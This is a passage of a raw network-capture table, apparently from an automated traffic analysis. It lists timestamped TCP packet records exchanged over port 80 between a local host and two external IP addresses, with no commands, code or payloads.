                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.286681890 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.286685944 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.286699057 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.286703110 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.286715031 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.286719084 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.286730051 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.286736965 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.286746025 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.286761045 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.286763906 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.286763906 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.286777020 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.286792040 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.286798000 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.286798000 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.286808014 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.286833048 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.286833048 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287012100 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287018061 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287028074 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287043095 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287051916 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287058115 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287064075 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287075043 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287077904 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287091017 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287102938 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287106991 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287111998 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287122965 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287122965 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287138939 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287142992 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287154913 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287163973 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287169933 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287177086 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287188053 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287192106 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287204027 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287209988 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287220955 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287230015 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287236929 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287247896 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287255049 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287261963 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287270069 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287276983 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287287951 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287291050 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287305117 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287308931 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287322044 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287322998 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287338972 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287353992 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287534952 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287549973 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287564993 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287574053 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287580967 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287595034 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287601948 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287614107 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287615061 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287617922 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287635088 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287642956 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287651062 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287662983 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287667990 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287678957 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287683964 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287689924 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287700891 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287705898 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287725925 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287730932 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287739992 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287748098 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287764072 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287770987 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287780046 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287789106 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287796974 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287801027 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287822008 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287832975 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287962914 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.287998915 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288002014 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288018942 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288049936 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288049936 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288088083 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288104057 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288119078 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288134098 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288141012 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288151026 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288167953 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288189888 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288197041 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288212061 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288235903 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288248062 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288263083 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288278103 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288295031 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288299084 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288311958 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288319111 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288336992 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288348913 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288376093 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288391113 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288407087 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288413048 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288424015 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288425922 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288441896 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288450003 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288459063 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288472891 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288475990 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288508892 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288510084 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.288574934 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.289176941 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.289191961 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.289207935 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.289236069 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.289247990 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.289262056 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.289263964 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.289280891 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.289289951 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.289294958 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.289304972 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.289320946 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.289335966 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.327867031 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.327884912 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.327902079 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.327922106 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.327939987 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.327955961 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.327954054 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.327955008 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.328043938 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.328043938 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.328075886 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.328093052 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.328125954 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.328160048 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.333334923 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.333400011 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.333400011 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.333416939 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.333448887 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.333482981 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.333502054 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.333518028 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.333534002 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.333548069 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.333549976 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.333575964 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.333576918 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.333610058 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369242907 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369277000 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369302988 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369318962 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369333982 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369337082 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369349003 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369364977 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369391918 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369391918 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369393110 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369416952 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369424105 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369432926 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369447947 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369452000 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369463921 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369481087 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369488955 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369488955 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369496107 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369510889 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369525909 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369525909 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369527102 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369541883 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369556904 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369556904 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369570971 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369584084 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369584084 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369605064 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369637012 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369669914 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369678974 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369678974 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369702101 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369745970 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369745970 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369755983 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369803905 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369820118 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369836092 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369868994 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369884014 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369904995 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369937897 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369942904 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369942904 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369971037 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.369973898 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370002985 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370035887 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370043993 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370043993 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370071888 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370093107 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370125055 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370157003 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370176077 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370176077 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370189905 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370220900 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370254040 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370261908 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370261908 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370286942 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370320082 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370327950 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370327950 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370354891 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370393991 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370393991 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370405912 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370438099 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370450020 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370470047 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370503902 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370537043 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370556116 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370556116 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370568991 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370601892 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370632887 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370641947 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370641947 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370682001 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370713949 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370721102 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370721102 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370748043 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370752096 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370779037 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370814085 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370814085 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370829105 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370862007 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370899916 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370899916 CEST5898180192.168.2.585.28.47.70
